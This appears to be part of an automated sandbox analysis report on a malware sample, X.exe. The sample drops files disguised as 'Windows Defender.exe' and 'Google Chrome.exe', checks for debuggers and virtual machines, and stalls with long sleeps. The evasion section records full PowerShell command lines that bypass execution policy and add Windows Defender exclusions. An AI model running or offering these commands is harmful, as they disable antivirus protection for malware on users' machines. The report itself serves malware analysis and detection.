                        Source: X.exe, 00000000.00000002.1750706228.00000000140F8000.00000004.00000800.00020000.00000000.sdmp, Google Chrome.exe, 0000000D.00000000.1724078447.0000000000612000.00000002.00000001.01000000.0000000A.sdmp, Google Chrome.exe.0.drBinary or memory string: SBIEDLL.DLL!JNIMQCKOED45DYFT!IAM0ALKDJV0MYMDL!NOJWIPYBQPULQVZX!GTHCXSPLOYJGMMWS!U3KBXZGSFAQWGJLH!VTFJEYIGIKXYFUP8!GIGCCSAGVAK9C4YO!QIBI2FXSGTAAGMKI!MNHKSXYNHIQU6EPF!MDQRLNDNNYD8JUAU!WVCSNOTCYEFGUQPY!DILHNZWKHYCAURAI!Y8SFBAVEXAHTZUTJ!QGJ8CDBC5CGS6HBMINFO
                        Source: C:\Users\user\Desktop\X.exeMemory allocated: 1360000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\Desktop\X.exeMemory allocated: 1C0F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeMemory allocated: 6B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeMemory allocated: 1A4B0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeMemory allocated: F20000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeMemory allocated: 1A9D0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeMemory allocated: 14E0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeMemory allocated: 1B150000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeMemory allocated: F10000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeMemory allocated: 1A7B0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeMemory allocated: BE0000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeMemory allocated: 1A810000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeMemory allocated: 2960000 memory reserve | memory write watch
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeMemory allocated: 1AAD0000 memory reserve | memory write watch
                        Source: C:\Users\user\Desktop\X.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5156Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4635Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7887Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1816Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6045Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1859Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6839
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1352
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7320
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2331
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8112
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1212
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7761
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1896
                        Source: C:\Users\user\Desktop\X.exe TID: 4048Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4136Thread sleep time: -7378697629483816s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep count: 7887 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2040Thread sleep count: 1816 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2380Thread sleep time: -2767011611056431s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6788Thread sleep count: 6045 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3132Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6792Thread sleep count: 1859 > 30Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4116Thread sleep time: -1844674407370954s >= -30000sJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe TID: 5456Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exe TID: 3020Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2344Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7104Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6584Thread sleep count: 7320 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1732Thread sleep time: -5534023222112862s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2140Thread sleep count: 2331 > 30
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe TID: 2144Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exe TID: 5132Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2912Thread sleep count: 8112 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2912Thread sleep count: 1212 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 568Thread sleep time: -3689348814741908s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3660Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 4008Thread sleep count: 7761 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7016Thread sleep time: -6456360425798339s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 6364Thread sleep count: 1896 > 30
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : Select * from Win32_ComputerSystem
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeFile Volume queried: C:\ FullSizeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeFile Volume queried: C:\ FullSizeInformation
                        Source: C:\Users\user\Desktop\X.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: Google Chrome.exe.0.drBinary or memory string: vmware
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess queried: DebugPortJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess queried: DebugPort
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: Debug
                        Source: C:\Users\user\Desktop\X.exeMemory allocated: page read and write | page guardJump to behavior

                        HIPS / PFW / Operating System Protection Evasion

                        barindex
                        Adds a directory exclusion to Windows Defender
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe'
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Google Chrome.exe'
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe'
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe'
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Google Chrome.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe'
                        Bypasses PowerShell execution policy
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe'
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Windows Defender.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Users\user\AppData\Local\Temp\Windows Defender.exe "C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Google Chrome.exe'Jump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Users\user\AppData\Local\Temp\Google Chrome.exe "C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe" Jump to behavior
                        Source: C:\Users\user\Desktop\X.exeProcess created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user~1\AppData\Local\Temp\Nursultan by fruktoozik.bat" "Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Windows Defender.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Windows Defender.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Windows Defender.exe'Jump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user~1\AppData\Local\Temp\Google Chrome.exe'
                        Source: C:\Users\user\AppData\Local\Temp\Google Chrome.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Google Chrome.exe'
                        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\chcp.com chcp 65001
                        Source: C:\Users\user\Desktop\X.exeQueries volume information: C:\Users\user\Desktop\X.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Users\user\AppData\Local\Temp\Windows Defender.exeQueries volume information: C:\Users\user\AppData\Local\Temp\Windows Defender.exe VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
